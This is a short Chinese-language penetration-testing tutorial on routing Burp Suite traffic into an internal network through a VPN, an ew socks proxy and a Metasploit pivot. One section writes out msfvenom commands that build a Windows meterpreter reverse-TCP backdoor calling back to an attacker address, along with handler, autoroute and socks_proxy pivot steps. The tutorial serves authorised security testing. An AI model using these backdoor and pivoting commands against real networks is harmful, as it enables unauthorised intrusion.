场景1:
通过VPN代理进入内网测试web时需要挂burp抓包改包,挂vpn直接访问的话、burp可以截到包但是无法正常访问到,这个时候我们可以配置上游代理进行抓包。
解决办法
设置方式1:
通过burp走上游代理burp->本地8080->本地系统代理->目标地址
配置burp
1.拦截包处和以前一样,在用户配置User Option处配置websocket,配置一个本地的socks代理
2.本地开一个socks代理,目的让浏览器的流量先走到本地的全局代理—》通过本地的全局代理通过vpn走到目标地址。
下载ew
https://github.com/idlefire/ew
ew.exe -s ssocksd -l 8888
3.配置全局代理
使用socks代理工具开一个全局代理,再抓包就ok了。
设置方式2:
在实际环境中,使用msf设置代理跨网段访问时,用的是socks4a模块现在的最新版本的msf这个工具已经把socks4a模块集合到socks模块里面。
代理的通信经过流程
本地
127.0.0.1:8080 ->localhost:25378->192.168.0.190:1080->10.10.10.130:80
首先生成后门
msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.0.190 lport=4455 -fexe >r.exe
设置msf监听模块
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.190 set lport 4455 exploit
设置web服务器
sudo python -m SimpleHTTPServer 80
设置路由
run autoroute -s 10.10.10.0/24
使用socks_proxy模块
backgroupd useauxiliary/server/socks_proxy setversion 4a run
使用SocksCap64设置代理隧道
192.168.0.190 1080
将火狐浏览器 代理到隧道中打开浏览目标网站
启动本地系统代理25378
设置顶级代理访问内网
抓包测试
场景2
burpsuite对内网的web系统进行漏洞扫描,或者进行测试,需要设置代理进行访问内网。
burpsuite设置socks5代理访问内网
使用ew开启socks5代理
ew_for_Win.exe-s ssocksd -l 1080

访问内网10段的80端口